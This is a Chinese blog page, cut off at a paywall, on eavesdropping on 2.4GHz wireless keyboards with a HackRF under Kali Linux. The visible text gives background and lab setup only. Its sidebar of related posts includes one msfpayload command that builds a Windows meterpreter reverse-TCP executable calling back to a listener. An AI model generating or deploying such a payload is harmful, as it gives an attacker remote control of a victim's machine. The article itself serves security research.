隐形的监控——无线键盘侦听

最新推荐文章于 2020-12-03 18:13:14 发布
最新推荐文章于 2020-12-03 18:13:14 发布
阅读量497 收藏 3
点赞数
文章标签: 无线键盘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sectown/article/details/79395186
版权
在用户使用计算机时,键盘是信息输入的主要媒介,键盘输入包含大量的私人机密信息,包括帐号密码等,所以键盘侦听被各种攻击者所大量采用,成为一种普遍但是破坏力强大的攻击方式。键盘侦听主要通过键盘记录器来实现,所以大部分杀毒软件都把键盘记录器识别为恶意文件,各种高安全要求的网站例如网上银行等,也都要安全ActiveX安全模块来抵御键盘记录器的威胁。和传统的有线键盘不同,在使用无线键盘时,用户信息不再直接输...
摘要由CSDN通过智能技术生成


在用户使用计算机时,键盘是信息输入的主要媒介,键盘输入包含大量的私人机密信息,包括帐号密码等,所以键盘侦听被各种攻击者所大量采用,成为一种普遍但是破坏力强大的攻击方式。键盘侦听主要通过键盘记录器来实现,所以大部分杀毒软件都把键盘记录器识别为恶意文件,各种高安全要求的网站例如网上银行等,也都要安全ActiveX安全模块来抵御键盘记录器的威胁。

和传统的有线键盘不同,在使用无线键盘时,用户信息不再直接输入到用户的计算机中,而是先在键盘内将用户的输入信息转化为相应的射频消息,然后将消息发送给适配器。适配器在接收到消息之后,会将消息按照规则转化为用户的输入递交给计算机进行处理。在无线键盘的使用过程中,可以发现在键盘和适配器的射频通讯如果被攻击者进行侦听,就会导致用户输入的泄露。与传统的键盘侦听手段不同,直接监听射频消息的攻击过程十分隐秘,用户完全无法察觉。

实验准备

在对无线键盘侦听的过程中,需要使用接收装置接收射频消息,这里选择使用的是 Hackrf来对用户输入进行侦听,实验平台为 kali Linux 。


在上一次对无线键盘研究中,已经确定无线键盘和适配器的通信频率为 2.4GHz,所以我们需要对这个频段对射频消息进行监听。在上一次使用重放攻击对用户输入进行干扰的过程中,我们已经获得了一些按键的射频消息,我们在上次的基础上展开。

 

实验过程

信号录制完成之后,需要对信号进行观察。在对无线电信号的研究中,我们发现Audicty作为一款音频处理软件,在处理无线电信号时也有十分优秀的效果,该软件是免费的,同时也有绿色版本,可供使用。这里首先使用Audicty导入录制好的按键射频信息。


最低0.47元/天 解锁文章
sectown
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hackrf遥控钥匙信号录制文件重放
weixin_43925963的博客
12-01 424
hackrf重放发送录制的信号文件
LimeSDR 无线信号重放攻击和逆向分析
Yaseng
09-03 7194
概述 在这篇文章中,我们将对某宝销量最高的一款无线门铃进行无线重放攻击和逆向分析其遥控信号的演示。 国内常见的无线遥控通常工作在315Mhz、433Mhz频率,欧美的采用868Mhz、915Mhz这2个频率。 拆开门铃,我们可以发现解码芯片为 华芯微HS1527 华芯微HS1527采用CMOS工艺制造,拥有20位地址码,可提供最多达1048576(2^20)种地址码,发射频率支持3...
无线键鼠监听与劫持
博文视点(北京)官方博客
01-19 528
引言:键盘是生活中最常见的硬件之一,无线键鼠由于其方便美观受到很多人的青睐,那么它的安全性如何呢?面对攻击我们又如何防护呢? 本文选自《硬件安全攻防大揭秘》。 1.无线键鼠的兴起  键盘连接到计算机有多种方式,有线键盘鼠标在生活中最常见,适用范围也很广泛,但有线连接不仅对操作距离有限制,而且给携带造成了不便。不仅如此,繁杂的线缆还很容易把桌面弄得凌乱不堪。无线键鼠非常好地解决了上述问题...
大量无线键盘存在KeySniffer漏洞-可嗅探用户输入的内容
weixin_34232617的博客
07-27 173
几美元的一根天线、一个无线发射器,还有几行Python代码,有了这些,黑客就可以在几十米开外主动地记录下你的用户名、密码、信用卡、你写的稿子,总之就是你用无线键盘输入的任何东西。 黑客所利用的是一种无线键盘漏洞,这种漏洞无法轻易防范,而且很难想到。来自Bastille安全公司的研究人员率先发现了这一漏洞,并把它命名为KeySniffer。 影响设备 ...
python实时检测键盘输入函数的示例
09-19
今天小编就为大家分享一篇python实时检测键盘输入函数的示例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
【pygame入门开发】一种键盘侦听的解决方案
08-15
新人入门,摸索着做的东西,希望大家能多提些意见,更希望大家能提供一些指导。 这一套项目还没有做完,现在实现了外置文件添加物料、主动添加未录入按键、显示已录入按键状态的基本功能。接下来想添加一些鼠标操作...
TCP.rar_侦听_网络侦听
09-20
【TCP.rar_侦听_网络侦听】是一个与网络编程相关的资源,主要涉及TCP协议的实现和网络侦听技术。这个资源包含了一个使用VC(Visual C++)编写的TCP网络侦听示例工程的源代码,是学习和理解TCP网络通信机制的一个宝贵...
iohook:Node.js全局键盘和鼠标侦听
02-02
Node.js全局本机键盘和鼠标侦听器。 该模块可以通过JavaScript / TypeScript应用程序内部和外部的本机挂钩处理键盘和鼠标事件。 发现了错误? 有想法吗随时发布或提交 。 查看。 平台支援 > = 0.6.0的版本仅支持...
键盘鼠标动作记录与回放
04-06
很多的系统监视软件和教学软件可以自动记录回放用户的输入文字或点击按钮等操作操作,这个功能的实现是使用了Windows的Hook函数。Windows提供API函数SetwindowsHookEx来建立一个Hook,通过这个函数可以将一个程序添加到Hook链中监视Windows消息
Node.js全局键盘和鼠标侦听器。-Node.js开发
05-27
关于Node.js全局本机键盘和鼠标侦听器。 该模块可以通过JavaScript / TypeScript应用程序内部和外部的本机挂钩处理键盘和鼠标事件。 发现了错误? 关于Node.js全局本机键盘和鼠标侦听器。 该模块可以通过JavaScript ...
kali生成shell监听目标主机
weixin_33805557的博客
10-21 610
生成监听用的shell.exe: reverse_tcp(反向连接) path : payload/windows/meterpreter/reverse_tcp msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe reverse_...
涨姿势|无线键盘潜在安全隐患分析
sectown的博客
02-28 1660
背景介绍由于射频技术的发展,键盘连接到计算机不再局限于有线的连接方式,而是出现了使用射频技术的无线键盘。相比较于传统的有线键盘无线键盘没有了繁杂的线缆,同时不再被距离限制。目前世面上的无线键鼠分为蓝牙类型和2.4GHz类型,其中2.4GHz类型的又占据了绝大部分的市场份额。2.4GHz类型的键鼠主要指利用专属无线协议开发的无线产品,使用时一般先在计算机的USB接口处插上一个适配器,鼠标和键盘通过...
至少8个品牌的无线键盘可在76米开外被黑客监听
weixin_34348174的博客
07-05 135
无线安全厂商Bastille表示,至少8个品牌的无线键盘存在漏洞,允许黑客从250英尺的范围内监听用户键入的内容。 问题在于无线键盘和与之关联的电脑的信号完全是在明文传输,而对信号简单的逆向就可以知道被监听对象现在在敲击哪个键。Bastille的一名研究员表示,攻击者可以使用成本不足100美元的电子狗在键盘闲置且与电脑实现配对的时候进行注入攻击。 目前...
万能无线键盘对码软件_网络安全|KeyLogger PRO键盘记录设备
weixin_39528219的博客
12-03 4383
多年来,已经有许多尝试记录关键信息的设备或软件此,如KeyLogger PRO设备,该设备具有有趣的功能,例如:· 通过WiFi连接设备(使用WPA2)· 通过无线方式查看击键数据(通过设备WiFi)· 在电子邮件报告中通过SMTP发送击键数据· 通过UDP将键击数据发送到服务器KeyLogger PRO的测量值约为1x1cm,如下图所示,它与标准尺寸笔记本电脑中的USB键盘连接器相比:图1 - ...
python pyhook
u011739633的专栏
06-06 1112
..
网络安全工程师演示:原来黑客是这样获取你键盘的所有输入信息的!
Kali与编程
11-09 448
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
1.侦听属性的综合实训——学生信息采集
最新发布
06-06
好的,下面是关于JavaScript侦听属性的综合实训——学生信息采集的介绍。 实验目的:通过学生信息采集的实验,掌握JavaScript侦听属性的使用方法,能够更好地理解事件的原理和应用。 实验内容: 1. 创建表单,包括学生姓名、学号、年龄、性别等信息的输入框。 2. 使用JavaScript监听表单元素的变化,当任一元素发生变化时,将变化的值输出到控制台。 3. 使用JavaScript监听表单提交事件,当表单提交时,将表单中的所有数据输出到控制台。 实验步骤: 1. 在HTML文件中创建表单,包括学生姓名、学号、年龄、性别等信息的输入框。 ```html <form> <label for="name">姓名:</label> <input type="text" id="name" name="name"><br> <label for="id">学号:</label> <input type="text" id="id" name="id"><br> <label for="age">年龄:</label> <input type="text" id="age" name="age"><br> <label for="gender">性别:</label> <input type="radio" id="male" name="gender" value="male"> <label for="male">男</label> <input type="radio" id="female" name="gender" value="female"> <label for="female">女</label><br> <input type="submit" value="提交"> </form> ``` 2. 在JavaScript文件中监听表单元素的变化,并将变化的值输出到控制台。 ```javascript var form = document.querySelector('form'); form.addEventListener('input', function(event) { console.log(event.target.id + ': ' + event.target.value); }); ``` 3. 在JavaScript文件中监听表单提交事件,并将表单中的所有数据输出到控制台。 ```javascript form.addEventListener('submit', function(event) { console.log('姓名:' + form.elements.name.value); console.log('学号:' + form.elements.id.value); console.log('年龄:' + form.elements.age.value); console.log('性别:' + form.elements.gender.value); event.preventDefault(); }); ``` 实验结果: 当输入框中的值发生变化时,控制台会输出相应的信息: ``` name: 张三 id: 2019123456 age: 20 gender: male ``` 当表单提交时,控制台会输出表单中的所有数据: ``` 姓名:张三 学号:2019123456 年龄:20 性别:male ``` 通过这个实验,你可以更好地理解JavaScript中侦听属性的使用方法,以及事件的原理和应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值